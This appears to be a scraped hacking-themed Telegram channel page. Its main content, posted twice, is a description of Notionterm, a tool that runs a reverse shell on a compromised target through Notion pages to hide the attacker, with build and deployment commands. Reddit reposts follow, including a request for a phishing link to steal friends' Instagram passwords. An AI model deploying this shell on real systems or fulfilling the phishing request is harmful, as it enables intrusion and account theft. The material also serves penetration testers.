Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
FOR: Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell) Demo/Quick proof insertion within report High available and shareable reverse shell (desktop, browser, mobile) Encrypted and authenticated remote (https://www.kitploit.com/search/label/Remote) shell NOT FOR: Long and interactive shell session (see tacos (https://github.com/ariary/tacos) for that)
Why? The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal How? Just use notion as usual and launch notionterm on target. Requirements Notion software and API key Allowed HTTP communication from the target to the notion domain Prior RCE on target
roughly inspired by the great idea of OffensiveNotion (https://github.com/mttaggart/OffensiveNotion) and notionion (https://github.com/ariary/Notionion)! Quickstart Set-up Create a page and give to the integration API key the permissions to have page write access Build notionterm and transfer it on target machine (see install (https://github.com/ariary/notionterm#install))
Run There are 3 main ways to run notionterm: "normal" mode
Get terminal, stop/unstop it, etc... notionterm [flags]
Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFF to pause, turn ON to resume etc... "server" mode
Ease notionterm embedding in any page notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]. light mode
Only perform HTTP traffic (https://www.kitploit.com/search/label/Traffic) from target → notion notionterm light [flags] Install As notionterm is aimed to be run on target machine it must be built to fit with it. Thus set env var to fit with the target requirement: GOOS=[windows/linux/darwin] Simple build git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go You will need to set API key and notion page URL using either env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url) "All-inclusive" build Embed directly the notion integration API token and notion page url in the binary. everybody with access (https://www.kitploit.com/search/label/Access) to the binary (https://www.kitploit.com/search/label/Binary) can retrieved the token. For security reason don't share it and remove it after use. Set according env var: export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN] And build it: git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go


Download Notionterm (https://github.com/ariary/notionterm)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Notionterm - Embed Reverse Shell In Notion Pages

https://blogger.googleusercontent.com/img/a/AVvXsEhJ9iwaL3IPcQi0zGw-dDSkJE8XvX_ACXFbN2RQNMPDJmay1_sgzvLY18gyKKBT-1-KoePezecaHZ57jjoFA2ERn8JMm61ww9OjMXYUU0PFnp069JkQkW3T5FP2mfUvC-VD1gqF4Yzbr_U273-BgsN1UzBf5BQnvUux66p0lTR4xdWZdfH6CLbcALjw=s16000 Embed reverse shell in Notion pages. Hack while taking noteshttps://blogger.googleusercontent.com/img/a/AVvXsEi6NULMA7E_OfBs-9kdWxPkgOi0Wrz9sqK7AboUzTCtWQgKtBuShfLvP5rW0ZHsCQ0fYGIEfHHhrB4aJiWRb9xLpol36fVC00DkGmwPgzB6wXWBiAxK7V9prtiiZVSCWPOR0DIMV5hX7CsNS8muu3FcxqyCBeBi9yiepT-apcRQBz6aElJB2nP-hMcS=w640-h428 FOR:* Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)* Demo/Quick proof insertion within report
* High available and shareable reverse shell (desktop, browser, mobile)
* Encrypted and authenticated remote shell NOT FOR:* Long and interactive shell session (see tacos for that) Why?The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal How?Just use notion as usual and launch notiontermon target. Requirements* Notion software and API key
* Allowed HTTP communication from the target to the notion domain
* Prior RCE on target
roughly inspired by the great idea of OffensiveNotion and notionion! QuickstartSet-up1. Create a page and give to the integration API key the permissions to have page write access
2. Build notiontermand transfer it on target machine (see install) RunThere are 3 main ways to run notionterm: "normal" modeGet terminal, stop/unstop it, etc...notionterm [flags] Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFFto pause, turn ONto resume etc... "server" modeEase notionterm embedding in any pagenotionterm --server [flags] Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]. lightmodeOnly perform HTTP traffic from target → notionnotionterm light [flags] InstallAs notiontermis aimed to be run on target machine it must be built to fit with it.

Thus set env var to fit with the target requirement: GOOS=[windows/linux/darwin]Simple buildgit clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
You will need to set API key and notion page URL using either env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url) "All-inclusive" buildEmbed directly the notion integration API token and notion page url in the binary.

everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.
Set according env var: export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
And build it: git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go
Download Notionterm

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Can a hacker replace all your apps and phone homescreen with gui?

Can a hacker create a gui overlay of all your apps and control what you see when using your phone or any app on it. Basically creating a fake screen which looks like the real app to where the user wouldnt know they are being havked and if so how would you know or go about finding out this was done?

submitted by /u/starwanderer11
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Phising sites

I remember years ago i watched a video on youtube which explained how you could basically just copy a link and send it to your friend and they would log in a fake instagram page and you would have their password and mess with them, but I’ve been looking for the website or anything related to it and all i can seem to find is stuff which require linux or coding. So if any of you know of the YouTube video or of the site where i can simply copy a link and send to my friends please let me know.

submitted by /u/BluebirdRemarkable31
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
https://b.thumbs.redditmedia.com/CT6EX995fsxbNRmgyd7t-ab7ROmPuRx4uWDMaABsY1E.jpg Be careful if you operate Network printer ' The printer works automatically!' It's called printer hacking

To view the image file, lots of Network printer exposure outside.

Hacker can attack Network printer which returned DISPLAY="READY" status.



https://preview.redd.it/ka2kubgmbb391.png?width=1511&format=png&auto=webp&s=522140795098e6f2e9b8d4a6753aa1469b143afc

submitted by /u/kevin02561
[link] [comments]